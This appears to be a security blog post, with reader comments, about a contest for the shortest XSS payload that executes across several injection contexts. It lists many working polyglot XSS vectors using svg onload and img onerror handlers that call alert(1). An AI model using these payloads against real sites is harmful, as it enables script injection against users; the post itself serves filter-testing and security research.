Multi-context XSS injection contest

I started to wonder a while ago how you could produce a vector that executed in many contexts. It’s cool because you can limit the number of requests an automated scanner uses without a high failure rate, you can even reduce the failure rate by making it as small as possible because some filters have a length limit. What does a multi-context vector look like I hear you ask?


That vector would work in both a single quoted script context and double quote. This idea spawned a contest to decide what was the smallest vector. I thought the original vector I posted couldn’t be beaten and I thought the challenge was impossible. @shafigullin proved me wrong πŸ™‚ The first contest is here.

My original vector was:
</script><svg onload='-/"/-alert(1)//'

The closing script breaks out of a script injection that filters quotes but doesn’t filter < and >, svg is used for the html context in both instances and the single and double quotes handle script injections where single or double quote isn’t filtered. The trick is building a vector that is valid syntax in each context otherwise it won’t execute. Originally @shafigullin said the challenge was also impossible but after a small delay he posted this cool vector:

</script><svg '//"

The clever use on comments and placing quotes inside the attribute space and using the fact that a new line is a new statement and the attribute onload is also valid JavaScript assignment. We concluded that the minimum length would be 36. Prove us wrong πŸ™‚

After that challenge I decided to create another one that used more contexts and made it trickier to execute. Same as before but with an anchor to click and a new script vector that removed characters as well. The anchor itself didn’t require much to execute since the html encoding would still work however it would not render if the markup before consumed it making it a subtle problem. I retained everyone’s valid vectors not the exact order they were sent to me but still a history of each one is nice to have to see how the contest progressed.

@insertScript 38 </script>"//'//<svg%0Aonload=alert(1)//> (IE9)
(current winner)
@theharmonyguy 38 '//</script><svg%20"%0aonload=alert(1)%20//>
@shafigullin 38 </script>'//<svg "%0Aonload=alert(1) //>
@theharmonyguy 39 '//</script><svg "%0Aonload=alert(1)// />
@insertScript 39 </script>"//'//<svg%0Aonload=alert(1) //>
@shafigullin 39 </script>'//<svg "%0Aonload=alert(1)// />
@insertScript 40 </script "//'//><svg%0Aonload=alert(1)//>
@theharmonyguy 41 ';//</script><svg ";%0Aonload=alert(1)// />#
@shafigullin 41 </script><img src '//"%0Aonerror=alert(1)//
@garethheyes 42 </script><svg onload='-/"/-[alert(1)]//'/>
@shafigullin 42 </script><img '//"%0Aonerror=alert(1)// src>
@shafigullin 44 </script><img '//"%0Aonerror=alert(1)// src=1>
@insertScript 44 </script "/*'/*><svg */; onload=alert(1) //>
@0xAli 47 </script><script>/*"/*'/**/;alert(1)//</script>#
@insertScript 50 </script "/*'/*><img/src=x */; onerror=alert(1) //
@0xAli 56 </script><script>/*var a="/*""'/**/;alert(1);//</script>

You can try the challenge yourself here don’t expect me to update the leader board though unless you break the 38 limit πŸ™‚

In summary challenges are great because they are fun and can answer what you think are impossible questions and help you interact with some amazing researchers and find techniques that you didn’t think of. Finally well done @insertScript for winning this contest as he was the fastest to 38 and produced an awesome vector.

16 Responses to “Multi-context XSS injection contest”

  1. @shafigullin writes:

    @theharmonyguy and my 37 symbols update for IE9 =)

  2. @shafigullin writes:

    @theharmonyguy and my 37 symbols vector for IE9

  3. @shafigullin writes:

    @theharmonyguy and my 37 symbols vector update for IE9

  4. @shafigullin writes:

    what’s wrong with %0a in link? =)

  5. Gareth Heyes writes:

    @shafigullin Dunno ask wordpress πŸ™‚ I get the idea though

  6. Soroush writes:

    Do you have any more general vector when x is a number without single or double quotation?

  7. avlidienbrunn writes:

    Nice vectors indeed! I tried a different approach with onerror, but the smallest I could make was 44 in firefox:‘;onerror=function()alert(1)%0Aa//<svg+onload=

  8. Gareth Heyes writes:


    That’s pretty nice and different.


    Sorry what do you mean? More contexts without quotes?

  9. @shafigullin writes:

    if you will make new challenge with more contexts I think that they should be in different iframes, then vectors will be more true πŸ˜‰

    @Soroush means x = XSS; I think

  10. @shafigullin writes:

    and alert(1) should change color of background to green to better debuging

  11. Gareth Heyes writes:

    Different iframes is a good idea but having all together was fun too since there are subtle markup problems. Next one will have iframes and more useful debugging info. I’ll make it slightly tougher too.

  12. Soroush writes:

    @Gareth Yes, I meant if we had: x=INPUT_HERE_NO_TAG;something=1;//etc
    @shafigullin You are right.

    Now, what do you think is/are the best signature(s) to detect a vulnerable website by using the final vector with the minimum false-positives (in an automated tool)?

  13. Gareth Heyes writes:

    IMO it’s </script><svg onload='-/"/-[alert(1)]//'/>

  14. David Vieira-Kurz ( @secalert ) writes:

    Hi, I’ve made it with 35 chars:


  15. Gareth Heyes writes:


    Not a valid entry I’m sorry πŸ™‚ your vector doesn’t execute in every context.

  16. Sandeep Kamble writes:

    Hey , Look like i am so late for this chall . Anyways Here is my payload πŸ™‚

    1st :